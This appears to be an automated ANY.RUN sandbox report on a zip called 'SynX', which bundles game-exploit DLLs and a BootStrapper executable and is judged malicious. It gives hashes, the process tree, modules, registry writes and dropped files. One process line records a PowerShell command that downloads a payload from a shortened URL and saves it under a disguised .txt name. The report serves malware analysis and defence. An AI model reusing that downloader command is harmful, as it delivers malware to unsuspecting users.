General Info

File name

SynX.zip

Full analysis
https://app.any.run/tasks/f59e9b1b-b0aa-43c1-a297-b1dc1c639b78
Verdict
Malicious activity
Analysis date
5/15/2019, 00:23:07
OS:
Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Indicators:

MIME:
application/zip
File info:
Zip archive data, at least v1.0 to extract
MD5

fb43eb87f2a5df9c5c543539a14e9747

SHA1

ca726e3d93ae4c4586c934ffbe4d723ad28604a9

SHA256

b290bc27bc4a2698e30b19d53ca79b7e082e38597c702e5578e5c059b48f1338

SSDEEP

49152:+o/OREwNSSiHU3n4ga8Gki9XmT69nos4/M:Z/ORJcSXn4ga91mT69nJ2M

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided as is, for the user's information. ANY.RUN does not guarantee maliciousness or safety of the content.

Software environment set and analysis options

Launch configuration

Task duration
60 seconds
Additional time used
none
Fakenet option
off
Heavy Evasion option
off
MITM proxy
off
Route via Tor
off
Network geolocation
off
Privacy
Public submission
Autoconfirmation of UAC
on

Software preset

  • Internet Explorer 8.0.7601.17514
  • Adobe Acrobat Reader DC MUI (15.023.20070)
  • Adobe Flash Player 26 ActiveX (26.0.0.131)
  • Adobe Flash Player 26 NPAPI (26.0.0.131)
  • Adobe Flash Player 26 PPAPI (26.0.0.131)
  • Adobe Refresh Manager (1.8.0)
  • CCleaner (5.35)
  • FileZilla Client 3.36.0 (3.36.0)
  • Google Chrome (73.0.3683.75)
  • Google Update Helper (1.3.33.23)
  • Java 8 Update 92 (8.0.920.14)
  • Java Auto Updater (2.8.92.14)
  • Microsoft .NET Framework 4.6.1 (4.6.01055)
  • Microsoft Office Access MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Access Setup Metadata MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Excel MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office OneNote MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Outlook MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office PowerPoint MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Professional 2010 (14.0.6029.1000)
  • Microsoft Office Proof (English) 2010 (14.0.6029.1000)
  • Microsoft Office Proof (French) 2010 (14.0.6029.1000)
  • Microsoft Office Proof (Spanish) 2010 (14.0.6029.1000)
  • Microsoft Office Proofing (English) 2010 (14.0.6029.1000)
  • Microsoft Office Publisher MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Shared MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Shared Setup Metadata MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Single Image 2010 (14.0.6029.1000)
  • Microsoft Office Word MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (9.0.30729.6161)
  • Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (10.0.40219)
  • Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (12.0.30501.0)
  • Microsoft Visual C++ 2013 x86 Additional Runtime - 12.0.21005 (12.0.21005)
  • Microsoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 (12.0.21005)
  • Microsoft Visual C++ 2017 Redistributable (x86) - 14.15.26706 (14.15.26706.0)
  • Microsoft Visual C++ 2017 x86 Additional Runtime - 14.15.26706 (14.15.26706)
  • Microsoft Visual C++ 2017 x86 Minimum Runtime - 14.15.26706 (14.15.26706)
  • Mozilla Firefox 65.0.2 (x86 en-US) (65.0.2)
  • Notepad++ (32-bit x86) (7.5.1)
  • Opera 12.15 (12.15.1748)
  • Skype version 8.29 (8.29)
  • VLC media player (2.2.6)
  • WinRAR 5.60 (32-bit) (5.60.0)

Hotfixes

  • Client LanguagePack Package
  • Client Refresh LanguagePack Package
  • CodecPack Basic Package
  • Foundation Package
  • IE Troubleshooters Package
  • InternetExplorer Optional Package
  • KB2534111
  • KB2999226
  • KB976902
  • LocalPack AU Package
  • LocalPack CA Package
  • LocalPack GB Package
  • LocalPack US Package
  • LocalPack ZA Package
  • ProfessionalEdition
  • UltimateEdition

Behavior activities

Application was dropped or rewritten from another process
  • BootStrapper.exe (PID: 3564)
Executes PowerShell scripts
  • cmd.exe (PID: 2496)
Creates files in the user directory
  • powershell.exe (PID: 2756)
Starts CMD.EXE for commands execution
  • BootStrapper.exe (PID: 3564)
Executable content was dropped or overwritten
  • WinRAR.exe (PID: 3164)

No info indicators.

Static information

TRiD
.zip
|   ZIP compressed archive (100%)
EXIF
ZIP
ZipRequiredVersion:
10
ZipBitFlag:
null
ZipCompression:
None
ZipModifyDate:
2019:05:13 19:09:27
ZipCRC:
0x00000000
ZipCompressedSize:
null
ZipUncompressedSize:
null
ZipFileName:
SynX/

Processes

Total processes
36
Monitored processes
4
Malicious processes
2
Suspicious processes
0

Behavior graph

Process tree (from the behavior graph): winrar.exe; bootstrapper.exe (no specs) → cmd.exe (no specs) → powershell.exe

Process information

PID
3164
CMD
"C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\admin\AppData\Local\Temp\SynX.zip"
Path
C:\Program Files\WinRAR\WinRAR.exe
Indicators
Parent process
––
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Alexander Roshal
Description
WinRAR archiver
Version
5.60.0
Modules
Image
c:\program files\winrar\winrar.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\comdlg32.dll
c:\windows\system32\shlwapi.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\windows\system32\shell32.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\ole32.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\powrprof.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\devobj.dll
c:\windows\system32\uxtheme.dll
c:\windows\winsxs\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\gdiplus.dll
c:\windows\system32\msimg32.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\api-ms-win-core-synch-l1-2-0.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\propsys.dll
c:\windows\system32\ntmarta.dll
c:\windows\system32\wldap32.dll
c:\windows\system32\riched20.dll
c:\program files\common files\microsoft shared\ink\tiptsf.dll
c:\windows\system32\windowscodecs.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\ehstorshell.dll
c:\windows\system32\cscui.dll
c:\windows\system32\cscdll.dll
c:\windows\system32\cscapi.dll
c:\windows\system32\ntshrui.dll
c:\windows\system32\srvcli.dll
c:\windows\system32\slc.dll
c:\windows\system32\imageres.dll
c:\windows\system32\mpr.dll
c:\windows\system32\drprov.dll
c:\windows\system32\winsta.dll
c:\windows\system32\ntlanman.dll
c:\windows\system32\davclnt.dll
c:\windows\system32\davhlpr.dll
c:\windows\system32\wkscli.dll
c:\windows\system32\netutils.dll
c:\windows\system32\wpdshext.dll
c:\windows\system32\winmm.dll
c:\windows\system32\portabledeviceapi.dll
c:\windows\system32\wintrust.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\audiodev.dll
c:\windows\system32\wmvcore.dll
c:\windows\system32\wmasf.dll
c:\windows\system32\ehstorapi.dll
c:\windows\system32\shdocvw.dll
c:\windows\system32\secur32.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\samcli.dll
c:\windows\system32\samlib.dll
c:\windows\system32\profapi.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\windows\system32\rpcrtremote.dll
c:\windows\system32\explorerframe.dll
c:\windows\system32\duser.dll
c:\windows\system32\dui70.dll

PID
3564
CMD
"C:\Users\admin\Desktop\SynX\BootStrapper.exe"
Path
C:\Users\admin\Desktop\SynX\BootStrapper.exe
Indicators
No indicators
Parent process
––
User
admin
Integrity Level
MEDIUM
Version:
Company
Description
Version
Modules
Image
c:\users\admin\desktop\synx\bootstrapper.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\shell32.dll
c:\windows\system32\winmm.dll
c:\windows\system32\ole32.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\propsys.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\ntmarta.dll
c:\windows\system32\wldap32.dll
c:\windows\system32\profapi.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\wininet.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\devobj.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\apphelp.dll

PID
2496
CMD
"C:\Windows\system32\cmd.exe" /c "C:\Users\admin\AppData\Local\Temp\D644.tmp\D645.tmp\D646.bat C:\Users\admin\Desktop\SynX\BootStrapper.exe"
Path
C:\Windows\system32\cmd.exe
Indicators
No indicators
Parent process
BootStrapper.exe
User
admin
Integrity Level
MEDIUM
Version:
Company
Microsoft Corporation
Description
Windows Command Processor
Version
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Image
c:\windows\system32\cmd.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\apphelp.dll

PID
2756
CMD
powershell -Command "(New-Object Net.WebClient).DownloadFile('https://rebrand.ly/eonfsiudfhsiudfh', 'dfaoijf9weafd98asdfw9ae8sf.txt')"
Path
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Indicators
Parent process
cmd.exe
User
admin
Integrity Level
MEDIUM
Version:
Company
Microsoft Corporation
Description
Windows PowerShell
Version
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Image
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\atl.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\ole32.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\mscoree.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\shell32.dll
c:\windows\system32\userenv.dll
c:\windows\system32\profapi.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\devobj.dll
c:\windows\system32\propsys.dll
c:\windows\system32\ntmarta.dll
c:\windows\system32\wldap32.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\shdocvw.dll
c:\windows\system32\linkinfo.dll
c:\windows\system32\ntshrui.dll
c:\windows\system32\srvcli.dll
c:\windows\system32\cscapi.dll
c:\windows\system32\slc.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\windows\microsoft.net\framework\v4.0.30319\mscoreei.dll
c:\windows\system32\version.dll
c:\windows\microsoft.net\framework\v2.0.50727\mscorwks.dll
c:\windows\winsxs\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.4940_none_d08cc06a442b34fc\msvcr80.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\mscorlib\62a0b3e4b40ec0e8c5cfaa0c8848e64a\mscorlib.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system\9e0a3b9b9f457233a335d7fba8f95419\system.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\microsoft.powershel#\4bdde288f147e3b3f2c090ecdf704e6d\microsoft.powershell.consolehost.ni.dll
c:\windows\assembly\gac_msil\system.management.automation\1.0.0.0__31bf3856ad364e35\system.management.automation.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.management.a#\a8e3a41ecbcc4bb1598ed5719f965110\system.management.automation.ni.dll
c:\windows\system32\psapi.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.core\fbc05b5b05dc6366b02b8e2f77d080f1\system.core.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\microsoft.powershel#\e112e4460a0c9122de8c382126da4a2f\microsoft.powershell.commands.diagnostics.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.configuratio#\f02737c83305687a68c088927a6c5a98\system.configuration.install.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\microsoft.wsman.man#\f1865caa683ceb3d12b383a94a35da14\microsoft.wsman.management.ni.dll
c:\windows\assembly\gac_msil\microsoft.wsman.runtime\1.0.0.0__31bf3856ad364e35\microsoft.wsman.runtime.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.transactions\ad18f93fc713db2c4b29b25116c13bd8\system.transactions.ni.dll
c:\windows\assembly\gac_32\system.transactions\2.0.0.0__b77a5c561934e089\system.transactions.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\microsoft.powershel#\82d7758f278f47dc4191abab1cb11ce3\microsoft.powershell.commands.utility.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\microsoft.powershel#\583c7b9f52114c026088bdb9f19f64e8\microsoft.powershell.commands.management.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\microsoft.powershel#\6c5bef3ab74c06a641444eff648c0dde\microsoft.powershell.security.ni.dll
c:\windows\microsoft.net\framework\v2.0.50727\culture.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.xml\461d3b6b3f43e6fbe6c897d5936e17e4\system.xml.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.management\6f3b99ed0b791ff4d8aa52f2f0cd0bcf\system.management.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.directoryser#\45ec12795950a7d54691591c615a9e3c\system.directoryservices.ni.dll
c:\windows\system32\shfolder.dll
c:\windows\system32\secur32.dll
c:\windows\system32\sspicli.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.data\1e85062785e286cd9eae9c26d2c61f73\system.data.ni.dll
c:\windows\assembly\gac_32\system.data\2.0.0.0__b77a5c561934e089\system.data.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\nsi.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\microsoft.net\framework\v2.0.50727\mscorjit.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.configuration\bc09ad2d49d8535371845cd7532f9271\system.configuration.ni.dll
c:\windows\system32\rasapi32.dll
c:\windows\system32\rasman.dll
c:\windows\system32\rtutils.dll
c:\windows\system32\mswsock.dll
c:\windows\system32\wshtcpip.dll
c:\windows\system32\wship6.dll
c:\windows\system32\winhttp.dll
c:\windows\system32\webio.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\winnsi.dll
c:\windows\system32\dhcpcsvc6.dll
c:\windows\system32\dhcpcsvc.dll
c:\windows\system32\dnsapi.dll
c:\windows\system32\rasadhlp.dll
c:\windows\system32\fwpuclnt.dll
c:\windows\system32\security.dll
c:\windows\system32\credssp.dll
c:\windows\system32\schannel.dll
c:\windows\system32\ncrypt.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\bcryptprimitives.dll
c:\windows\system32\gpapi.dll

Registry activity

Total events
699
Read events
599
Write events
100
Delete events
0

Modification events

PID | Process | Operation | Key | Name | Value
3164 | WinRAR.exe | write | HKEY_CURRENT_USER\Software\WinRAR\Interface\Themes | ShellExtBMP | ––
3164 | WinRAR.exe | write | HKEY_CURRENT_USER\Software\WinRAR\Interface\Themes | ShellExtIcon | ––
3164 | WinRAR.exe | write | HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E | LanguageList | en-US
3164 | WinRAR.exe | write | HKEY_CURRENT_USER\Software\WinRAR\ArcHistory | 0 | C:\Users\admin\AppData\Local\Temp\SynX.zip
3164 | WinRAR.exe | write | HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths | name | 120
3164 | WinRAR.exe | write | HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths | size | 80
3164 | WinRAR.exe | write | HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths | type | 120
3164 | WinRAR.exe | write | HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths | mtime | 100
3164 | WinRAR.exe | write | HKEY_CURRENT_USER\Software\WinRAR\Interface\MainWin | Placement | 2C0000000000000001000000FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF010000006C000000C103000061020000
3164 | WinRAR.exe | write | HKEY_CURRENT_USER\Software\WinRAR\General | LastFolder | C:\Users\admin\AppData\Local\Temp
3164 | WinRAR.exe | write | HKEY_CURRENT_USER\Software\WinRAR\FileList\ArcColumnWidths | name | 120
3164 | WinRAR.exe | write | HKEY_CURRENT_USER\Software\WinRAR\FileList\ArcColumnWidths | size | 80
3164 | WinRAR.exe | write | HKEY_CURRENT_USER\Software\WinRAR\FileList\ArcColumnWidths | psize | 80
3164 | WinRAR.exe | write | HKEY_CURRENT_USER\Software\WinRAR\FileList\ArcColumnWidths | type | 120
3164 | WinRAR.exe | write | HKEY_CURRENT_USER\Software\WinRAR\FileList\ArcColumnWidths | mtime | 100
3164 | WinRAR.exe | write | HKEY_CURRENT_USER\Software\WinRAR\FileList\ArcColumnWidths | crc | 70
3164 | WinRAR.exe | write | HKEY_CURRENT_USER\Software\WinRAR\General\Toolbar\Layout | Band56_0 | 38000000730100000402000000000000D4D0C8000000000000000000000000006C0104000000000039000000B40200000000000001000000
3164 | WinRAR.exe | write | HKEY_CURRENT_USER\Software\WinRAR\General\Toolbar\Layout | Band56_1 | 38000000730100000500000000000000D4D0C8000000000000000000000000002201050000000000160000002A0000000000000002000000
3164 | WinRAR.exe | write | HKEY_CURRENT_USER\Software\WinRAR\General\Toolbar\Layout | Band56_2 | 38000000730100000400000000000000D4D0C8000000000000000000000000005E0204000000000016000000640000000000000003000000
3564 | BootStrapper.exe | write | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap | UNCAsIntranet | 0
3564 | BootStrapper.exe | write | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap | AutoDetect | 1
2756 | powershell.exe | write | HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E | LanguageList | en-US
2756 | powershell.exe | write | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32 | EnableFileTracing | 0
2756 | powershell.exe | write | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32 | EnableConsoleTracing | 0
2756 | powershell.exe | write | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32 | FileTracingMask | 4294901760
2756 | powershell.exe | write | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32 | ConsoleTracingMask | 4294901760
2756 | powershell.exe | write | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32 | MaxFileSize | 1048576
2756 | powershell.exe | write | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32 | FileDirectory | %windir%\tracing
2756 | powershell.exe | write | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS | EnableFileTracing | 0
2756 | powershell.exe | write | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS | EnableConsoleTracing | 0
2756 | powershell.exe | write | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS | FileTracingMask | 4294901760
2756 | powershell.exe | write | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS | ConsoleTracingMask | 4294901760
2756 | powershell.exe | write | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS | MaxFileSize | 1048576
2756 | powershell.exe | write | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS | FileDirectory | %windir%\tracing

Files activity

Executable files
4
Suspicious files
2
Text files
73
Unknown types
0

Dropped files

PID
Process
Filename
Type
3164
WinRAR.exe
C:\Users\admin\AppData\Local\Temp\Rar$DRa3164.14280\SynX\BootStrapper.exe
executable
MD5: b36f7ce4da9e1632b424b9c4ed00d081
SHA256: 9ce4827401db6974f5781e8e306dc1ebdc1c60e2230665ebc358021f0fce71d1
3164
WinRAR.exe
C:\Users\admin\AppData\Local\Temp\Rar$DRa3164.14280\SynX\WeAreDevs_API.dll
executable
MD5: 64ebd16faf23058eb4f4b550434bdb2e
SHA256: 68472d2d047e4064a3347711b5b060a35630e70fea92a9eabb90ac6b5915b526
3164
WinRAR.exe
C:\Users\admin\AppData\Local\Temp\Rar$DRa3164.14280\SynX\dfaoijf9weafd98asdfw9ae8sf.txt
executable
MD5: aea9af5c06fe26bb7210362cb7d74dc0
SHA256: 7b7568d89d378f2e95a289ee8033a1c7d6ed572ed6ecbe66269f80ec2af4a5f4
3164
WinRAR.exe
C:\Users\admin\AppData\Local\Temp\Rar$DRa3164.14280\SynX\WeAreExploitersAPI.dll
executable
MD5: 23820981b2f96355d5c73b95056c5564
SHA256: 3c3cd250d2ae46ee37da5af92c3659ceed3bb087b0d50882e457d692d70bfe64
2756
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF12d876.TMP
binary
MD5: 131dc75f6d4142ca9244945a91a71e8d
SHA256: f17c463c77b5da9e795770a82e0a7fb1023023f44397f6e080721e9811b2a0c4
2756
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\XBARDV9VYZHAVPWQ44TI.temp
––
MD5:  ––
SHA256:  ––
3164
WinRAR.exe
C:\Users\admin\AppData\Local\Temp\Rar$DRa3164.14280\SynX\Monaco\vs\language\typescript\tsWorker.js
text
MD5: 1e0047691c3637ad1e0da62023ba0e0d
SHA256: 2ccc6b6b1b5d884fe8df3e7b2f2bacca0c4529b68bbfe3c547fcc74f204cc5d1
3164
WinRAR.exe
C:\Users\admin\AppData\Local\Temp\Rar$DRa3164.14280\SynX\Monaco\vs\loader.js
text
MD5: 8a3086f6c6298f986bda09080dd003b1
SHA256: 0512d9ed3e5bb3daef94aa5c16a6c3e2ee26ffed9de00d1434ffe46a027b16b9
3164
WinRAR.exe
C:\Users\admin\AppData\Local\Temp\Rar$DRa3164.14280\SynX\Monaco\vs\language\typescript\lib\typescriptServices.js
text
MD5: 0a1a293455f5451ba11e07386ea62d4f
SHA256: 90e98063c644749a948edd5a7801f7b00c554e3189fe7c2811926b01eaf1b41f
3164
WinRAR.exe
C:\Users\admin\AppData\Local\Temp\Rar$DRa3164.14280\SynX\Monaco\vs\language\typescript\tsMode.js
text
MD5: 8c1a82479c380d2b2c6b096e12ee9632
SHA256: 70957c5ede2834adf1b5bc264e119f82b4e8e6c169fc8ff140d637d1c5287bd9
3164
WinRAR.exe
C:\Users\admin\AppData\Local\Temp\Rar$DRa3164.14280\SynX\Monaco\vs\language\json\jsonMode.js
text
MD5: 44955b6c43b7aac58492233efeeb70ad
SHA256: 08af59e449f6c058514bf05c54511ee6ec83934ab9dc3e803257196b2812e8ae
3164
WinRAR.exe
C:\Users\admin\AppData\Local\Temp\Rar$DRa3164.14280\SynX\Monaco\vs\language\html\htmlWorker.js
text
MD5: 3f5802a91a29e4504d5cd2f10ac280b8
SHA256: e80444d8fa519ff86e5c696a40843bc8392b2d3afb83118a2dd92da5497c9212
3164
WinRAR.exe
C:\Users\admin\AppData\Local\Temp\Rar$DRa3164.14280\SynX\Monaco\vs\language\json\jsonWorker.js
text
MD5: 61e9b732bedc39b547804ac7e8897aab
SHA256: 7c6d37bb341cf59335f6a3e5e336d0de863124fa40a8f9b5f29d8da07891b649
3164
WinRAR.exe
C:\Users\admin\AppData\Local\Temp\Rar$DRa3164.14280\SynX\Monaco\vs\editor\standalone\browser\quickOpen\symbol-sprite.svg
image
MD5: 649fb0a55b0e0fc9d79e6b7872a14c10
SHA256: fcc3026b97068f3d9e1743d36ca26b96ffdbcd2841fa9d804caccc4f249911c8
3164
WinRAR.exe
C:\Users\admin\AppData\Local\Temp\Rar$DRa3164.14280\SynX\Monaco\vs\language\html\htmlMode.js
text
MD5: c944ad9527d22b6ca6c0d54fd0723296
SHA256: 80d6f099563af129b4deff66f7b9d4dfb27ad0058dcb5b77d927e460022dafee
3164
WinRAR.exe
C:\Users\admin\AppData\Local\Temp\Rar$DRa3164.14280\SynX\Monaco\vs\language\css\cssMode.js
text
MD5: 40a99739f89d382c92eb26f05a9a4497
SHA256: d3108af9ffcdad3133345686646cafe3b628ad6b25a3758786b2aa7b7b51809d
3164
WinRAR.exe
C:\Users\admin\AppData\Local\Temp\Rar$DRa3164.14280\SynX\Monaco\vs\language\css\cssWorker.js
text
MD5: 152244e2ab4f663141e9466a8282ebe8
SHA256: 288bb68a2c685957b5dc3e5353b1a03dc482b10858059063b99c1549d5fef01c
3164
WinRAR.exe
C:\Users\admin\AppData\Local\Temp\Rar$DRa3164.14280\SynX\Monaco\vs\editor\editor.main.nls.js
text
MD5: 74dd2381ddbb5af80ce28aefed3068fc
SHA256: fdd9d64ce5284373d1541528d15e2aa8aa3a4adc11b51b3d71d3a3953f8bcc48
3164
WinRAR.exe
C:\Users\admin\AppData\Local\Temp\Rar$DRa3164.14280\SynX\Monaco\vs\editor\editor.main.nls.zh-tw.js
text
MD5: 73031ff9956da03354038b3185222af8
SHA256: 7751df224ac12dbc2e918b12fdbaa465306b6c511e4e1587790163edac18ad46
3164
WinRAR.exe
C:\Users\admin\AppData\Local\Temp\Rar$DRa3164.14280\SynX\Monaco\vs\editor\editor.main.nls.zh-cn.js
text
MD5: f954ac1091c6d0b640ed5f0abdcd8adb
SHA256: ac881e6f56544ed9b8dd4fd8fd8a73f1da864fb8d79d91c45f5a51f923bd5287
3164
WinRAR.exe
C:\Users\admin\AppData\Local\Temp\Rar$DRa3164.14280\SynX\Monaco\vs\editor\editor.main.nls.ko.js
text
MD5: 9ccf83d22e9a9bfafa2000f366ac47e6
SHA256: 100ca482c015571ed9aad97c2dcc5e266b270a650ce892507443b5d4f32df64f
3164
WinRAR.exe
C:\Users\admin\AppData\Local\Temp\Rar$DRa3164.14280\SynX\Monaco\vs\editor\editor.main.nls.ru.js
text
MD5: fd1aa66906d2b3c0c9b734b17f04d73b
SHA256: fa180f7b77ee252aefe73ba5993fbe7c89f43482358d7fd32e8e2f50b3b21bed
3164
WinRAR.exe
C:\Users\admin\AppData\Local\Temp\Rar$DRa3164.14280\SynX\Monaco\vs\editor\editor.main.js
text
MD5: 9399a8eaa741d04b0ae6566a5ebb8106
SHA256: 93d28520c07fbca09e20886087f28797bb7bd0e6cf77400153aab5ae67e3ce18
3164
WinRAR.exe
C:\Users\admin\AppData\Local\Temp\Rar$DRa3164.14280\SynX\Monaco\vs\editor\editor.main.nls.es.js
text
MD5: b371235f971baa51f58f123f40c4435a
SHA256: 203ff3591e02eb7b55a591e53919cc337f8dea73e6446fc3493227761c0794ba
3164
WinRAR.exe
C:\Users\admin\AppData\Local\Temp\Rar$DRa3164.14280\SynX\Monaco\vs\editor\editor.main.nls.ja.js
text
MD5: a1f3c9e940206ca310147d644305a6e1
SHA256: ea9f5e8993017f858cd9ee70aac3d7990ca85eaf40a052025e530fb1c300837f
3164
WinRAR.exe
C:\Users\admin\AppData\Local\Temp\Rar$DRa3164.14280\SynX\Monaco\vs\editor\editor.main.nls.de.js
text
MD5: 4d83bc1bced6f773423be6f939472cfe
SHA256: 0dee462d5fb231f169f6cbc432465a43fd445c011fe650e29f5fb2bccc31eaae
3164
WinRAR.exe
C:\Users\admin\AppData\Local\Temp\Rar$DRa3164.14280\SynX\Monaco\vs\editor\editor.main.nls.fr.js
text
MD5: d319e61fc6b357b9a5d8e3bbaa44ce3c
